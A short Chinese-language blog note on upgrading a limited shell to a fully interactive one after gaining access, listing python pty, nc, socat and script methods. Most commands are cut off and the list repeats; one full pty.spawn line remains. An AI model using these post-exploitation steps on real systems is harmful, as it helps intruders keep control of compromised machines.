交互式shell
一、参考链接
https://saucer-man.com/information_security/233.html
二、命令记录
1、python pth方式
1 | python -c 'import pty; pty.spawn("/bin/bash")' |
2、升级nc为完全交互
1 | 攻击机本地执行 |
3、使用socat
1 | 攻击机: |
4、script获取pty
1 | C:\Users\w5023 |
现实告诉我: 保持好奇心,享受孤独
https://saucer-man.com/information_security/233.html
1 | python -c 'import pty; pty.spawn("/bin/bash")' |
1 | 攻击机本地执行 |
1 | 攻击机: |
1 | C:\Users\w5023 |